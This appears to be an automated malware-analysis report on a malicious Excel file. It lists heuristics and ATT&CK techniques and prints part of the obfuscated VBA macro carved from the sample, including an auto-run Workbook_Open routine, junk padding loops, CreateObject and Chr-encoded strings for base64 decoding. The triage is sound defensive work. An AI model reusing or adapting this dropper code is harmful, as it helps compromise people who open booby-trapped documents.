MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The file is an Excel document containing VBA macros, specifically a Workbook_Open macro. This macro uses obfuscated code and a CreateObject call, indicative of an attempt to download and execute a secondary payload. The presence of a Workbook_Open macro and the use of Shell() and CreateObject() strongly suggest malicious intent to compromise the user's system.
Heuristics 6
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- Workbook_Open macro (high) OLE_VBA_WBOPEN: Workbook_Open macro
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14912 bytes |

SHA-256: 5b469b88b74fae2504f6b8ebff164af2ad097304315547e5a6502b1c837ca762
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 8 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
afiaz3TRBL.Z3Q389FTSFnBvCvtmttC
While 11 = 4716
Dim Qf36kjP1FayWiR7IywiQBZYJk248gp As Variant
Wend
Dim kmmyK3_UQVrNL As Integer
While 6 = 6159
Dim QOac_l4zJbAzEqSrpQSZyKstFDHcdKhvLf3TYY34utbJxTvRAhpY As Variant
Wend
Dim vCEfqV_cZT83Mm As Integer
While 6 = 1086
Dim hw8QOXXn_rh5vPyb6eH1ZcwxrC2ZTXcQjpLeCPYAfG8V7uisn7XasU As Variant
Wend
Dim L__HiLe7Ro As Integer
While 6 = 5207
Dim NPT_CSYo_GSQeY16bHuV9AgMcGd3pLdhxQGpZdoTgsVkB4 As Variant
Wend
Dim hjQmsVK5oLr As Integer
While 15 = 1073
Dim Ek5xe82lucLQId8bZxOn5Khh4jCbGV As Variant
Wend
Dim l47S3teBud8PYUQ As Integer
While 27 = 4315
Dim GGu3tFYhw4BU445XdWkjVKIDr5vcH64GL As Variant
Wend
Dim kb4qNluLUIY As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "afiaz3TRBL"
Dim uwMx_ofaQriIIlnytfsRsnKuKxA9OwMLYiqU_jCUACLf2GUf6hVHBDnFkbkOnfKdcVsi4QtIbWQpZn2DbdCpZ_IU5jtl8vpczrC As String
Function zWkFzEc2xu558pIxS5Xz93HQa_qNuyVAAtMSSnmC(Xtqi2olr2BOoPYfQUgNn5NaQZ1FFLli7HFxGIot1NIZMcTJjn449w9cIRXHAgeeNbQeIjXFovVX)
While 7 = 9279
Dim vK6NlDSlNLqfERlS4dZZCQJ68PeQDXrasGXtD As Variant
Wend
Dim oFPxBcAwYi2 As Integer
While 12 = 8382
Dim GPDGeZrc__OTgAhzcOw741OMVIlAwHGhpmIvSi5QX4sCXvr As Variant
Wend
Dim vbmfflk7O_z As Integer
Dim oXG4zdWHvu_e_mjx8vlz6h8FZizuv3BITzoGD6iw4wvyz7uKUlQzVxAEYAcOnkV2ryIN8btBLx5HvHObwmYIkJvfxhrCaSHRY3E_wfM21Omg22SOtAaAKLPfBmY
While 4 = 1281
Dim uUxqo11qn41ue3Tdh9FKxiZygIkk5Do3vcxhcqN2K As Variant
Wend
Dim qGx5pGlKFC8GxAJ As Integer
While 11 = 6875
Dim HeNOuiM79A_uA1tM_Fak3zA8XwAqt8blmdg As Variant
Wend
Dim rm65gi8qFgYEKL4 As Integer
Dim hFypIeQpseXUeD_9vzDbE26y1x8_yQKEX6bIe4_FAyM6I3Gi74aprNIpI_xUfK1ZRR7hkzc1z6aOm_o
While 9 = 6472
Dim x3rRDRcOz7gfKAgbGeSAjCK3B5H4Z9qycz As Variant
Wend
Dim Ii3TYMNWE7_ As Integer
While 8 = 1046
Dim CuohDQi2KRtpxPHHhx1OrBU18hvE_uL7N38IbUUpF7PgX2DDPDohNpP As Variant
Wend
Dim AYxiedcvYEwa As Integer
While 8 = 755
Dim Q8pLaIHutwa_crx_Emrhl7smuzKlI1ZkZHuQWbF As Variant
Wend
Dim fdOkUdAunvSb_3R As Integer
While 28 = 8257
Dim TMBZj7fk3VznT7fllfmAFpGPPyZ7Wf8ffzZCTAeF_ As Variant
Wend
Dim VMeyoxGIq6a1Kn As Integer
Set hFypIeQpseXUeD_9vzDbE26y1x8_yQKEX6bIe4_FAyM6I3Gi74aprNIpI_xUfK1ZRR7hkzc1z6aOm_o = CreateObject(uwMx_ofaQriIIlnytfsRsnKuKxA9OwMLYiqU_jCUACLf2GUf6hVHBDnFkbkOnfKdcVsi4QtIbWQpZn2DbdCpZ_IU5jtl8vpczrC)
While 12 = 6247
Dim EtItfhMUXSFdebPj_e_LS3uaIkxLyB_o As Variant
Wend
Dim nu7i1tjao_yKq As Integer
While 27 = 719
Dim JQn2E5518TL9rj4s_eUMazteprN5hfRChs8RITsEHwoZsjHHoq As Variant
Wend
Dim ocb7OSgHJVp_RZ As Integer
eWukmxLonv7o6igvIceDWKWnSgGJppwzrkVpq2Y1MXdi74xBZ9f_TmnR9FPEpA988F7TL1_PDmz9qwpYs_spHvdD6CpikRJKXejz7byi4O6pwokKY1VjQRyKk2XHJdotbniJKzbOOIv2ywOOacIs = Chr(243 - 145) & Chr(132 - 27) & Chr(191 - 81) & Chr(124 - 78) & Chr(375 - 277) & Chr(167 - 70) & Chr(186 - 71) & Chr(170 - 69) & Chr(61 - 7) & Chr(293 - 241)
While 9 = 5516
Dim AHY8kjinv
... (truncated)